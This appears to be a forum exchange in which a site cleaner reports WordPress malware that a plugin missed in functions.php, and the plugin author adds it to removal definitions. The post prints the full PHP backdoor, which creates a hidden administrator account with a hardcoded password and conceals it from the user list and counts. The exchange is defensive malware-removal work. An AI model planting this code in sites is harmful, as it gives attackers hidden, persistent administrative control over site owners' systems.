I just cleaned up a site and there were a few items missed by the plugin including the following devious admin account creation and hiding in the functions.php file –
function wpb_admin_account(){ $user = ‘wpadminas’; $pass = ‘OpF^MJrUK$SzYcOrfG’; $email = ‘email@email.em’; if ( !username_exists( $user ) && !email_exists( $email ) ) { $user_id = wp_create_user( $user, $pass, $email ); $user = new WP_User( $user_id ); $user->set_role( ‘administrator’ ); }}add_action(‘init’,'wpb_admin_account’);add_action(‘pre_user_query’,'yoursite_pre_user_query’);function yoursite_pre_user_query($user_search) { global $current_user; $username = $current_user->user_login; if ($username != ‘codepapa’) { global $wpdb; $user_search->query_where = str_replace(‘WHERE 1=1′, ”WHERE 1=1 AND {$wpdb->users}.user_login != ‘wpadminas’”,$user_search->query_where); }}add_filter(“views_users”, “dt_list_table_views”);function dt_list_table_views($views){ $users = count_users(); $admins_num = $users['avail_roles']['administrator'] – 1; $all_num = $users['total_users'] – 1; $class_adm = ( strpos($views['administrator'], ‘current’) === false ) ? “” : “current”; $class_all = ( strpos($views['all'], ‘current’) === false ) ? “” : “current”; $views['administrator'] = ‘<a href=”users.php?role=administrator” class=”‘ . $class_adm . ‘”>’ . translate_user_role(‘Administrator’) . ‘ <span class=”count”>(‘ . $admins_num . ‘)</span></a>’; $views['all'] = ‘<a href=”users.php” class=”‘ . $class_all . ‘”>’ . __(‘All’) . ‘ <span class=”count”>(‘ . $all_num . ‘)</span></a>’; return $views;}
Thanks so much for sending me this file. I have added this new variant of this malicious script injection into my latest definition update so that it can now be automatically removed using my plugin. Please download the latest definitions and let me know if you find any more.
Your very welcome. Thank you for maintaining such as great tool to help fight against malware. I have been using your plugin for years.
